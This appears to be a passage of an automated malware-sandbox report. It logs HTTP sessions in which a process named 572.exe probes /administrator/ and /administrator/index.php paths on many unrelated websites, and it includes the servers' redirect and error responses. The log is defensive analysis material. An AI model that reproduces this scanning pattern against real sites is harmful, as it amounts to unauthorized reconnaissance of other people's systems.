                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6f3b236735-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.918814898 CET352OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=RK8vmG9lETn.Xnl7j2tT0ZGWpUSne35Shd6noBC8654-1707131691-1-AeNFRU+pi2Eke44tUtCYz8WlBvPkupl2+xSbR3tPLQOUhxxFZQgtdqhbMCAjUNMNqMxWwmaM/ks2JGJg65bPVb8=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.143982887 CET416INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-ded6941-web19
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abbab1dcd6735-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 00 00 ff ff 03 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 73(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.144007921 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                200192.168.2.655404192.185.5.2380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.347701073 CET178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.568666935 CET226INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                201192.168.2.65540313.249.120.8680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.347718954 CET174OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: tiktok.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.451564074 CET574INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://tiktok.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 c403373b316e0bf7f3a326c1ff50549e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL51-C1
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: ad0SNust0C0AoQ3_eS-uAD5P27IiyMrWgOMUizR4Al5XX-EqnxuLPQ==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.090922117 CET183OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: tiktok.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.192435026 CET583INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://tiktok.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 c403373b316e0bf7f3a326c1ff50549e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL51-C1
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 7yUZ4Ah0jlAYaF0q-G4Qp9m7ciqL2bSwFo1xQuQOCJUl9VjabvwTqQ==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                202192.168.2.6554003.134.125.17580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.348078012 CET193OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.470964909 CET334INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/administrator/
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 9fb72879f41a7cb8d3310d13d57fc275
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 88
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 33 66 62 61 2d 31 38 30 2d 32 35 32 2d 31 36 36 2d 32 33 36 2e 6e 67 72 6f 6b 2e 69 6f 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/administrator/">Temporary Redirect</a>.
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.354140043 CET202OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.477114916 CET352INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 52d8788210ef19435f8fcb6f2de18da8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 97
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 33 66 62 61 2d 31 38 30 2d 32 35 32 2d 31 36 36 2d 32 33 36 2e 6e 67 72 6f 6b 2e 69 6f 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/administrator/index.php">Temporary Redirect</a>.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                203192.168.2.6554163.161.136.6980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.350908041 CET193OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.binance.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.452697992 CET593INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.binance.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 8aab54319c0ac9015398a33740754126.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: Kw0abCXq9AXr-L9WgCB8HDG5MHfy9bix6gXpLzRY5vVNfT_pHGJHqw==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                204192.168.2.655402170.114.52.480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.350955963 CET179OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.492089033 CET1027INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://us04web.zoom.us/administrator/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=hEFd9VotZ3vyLm3XCxgQ38NStr8IlQwszyEH3jTE36k-1707131691-1-Ad8gM1Twu9Jb7c7bwW/Lnf0FOIqZuaEXj3c49w6h515FGYT7zevcKG7KUwj9NQP+zsgeE8MARtdmGpgaeBD1BCM=; path=/; expires=Mon, 05-Feb-24 11:44:51 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AEfU2FM5jBx8uJLl8JDr3REL8rTpdPiUDYo0qzRrCzsL0o9sQ6YZqfE2rf7uclJ%2BuyJiErXz5YGHSmc4KT%2B0R3%2F1qNctIt53C4uJipP%2FGq0%2FMISPWOHLvBsdjfV3RDgVSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6f4c6a7be1-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:05.981450081 CET351OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=hEFd9VotZ3vyLm3XCxgQ38NStr8IlQwszyEH3jTE36k-1707131691-1-Ad8gM1Twu9Jb7c7bwW/Lnf0FOIqZuaEXj3c49w6h515FGYT7zevcKG7KUwj9NQP+zsgeE8MARtdmGpgaeBD1BCM=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                205192.168.2.655413104.21.5.2580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.351686001 CET187OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: opsu.terna.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.479321003 CET693INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://terna.net
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6T5WzYOSDgN22zIf02Bj7FcgkEQ8epDTQvsfUcC4hHSUPNu4uoQwyOjS4SIW0wrRizc4H67VqSytmrqRAnplr8x7AcW1Yi9Y8q14L%2FUdOqEwUOACuZjYtYzihU7knChzcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6f494d44d0-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                206192.168.2.655401103.224.182.21080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.354595900 CET183OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.561472893 CET351INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                                                                                                                                                set-cookie: __tad=1707131691.1659755; expires=Thu, 02-Feb-2034 11:14:51 GMT; Max-Age=315360000
                                                                                                                                                                                                                                                                                                                                                                location: http://ww16.followerstiktok.xyz/administrator/?sub1=20240205-2214-51bd-9054-4443f76afe9b
                                                                                                                                                                                                                                                                                                                                                                content-length: 2
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                207192.168.2.655202188.212.100.15480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.354721069 CET175OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zarkana2.ro
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.592978001 CET1033INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 795
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:17 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                location: https://zarkana2.ro/administrator/
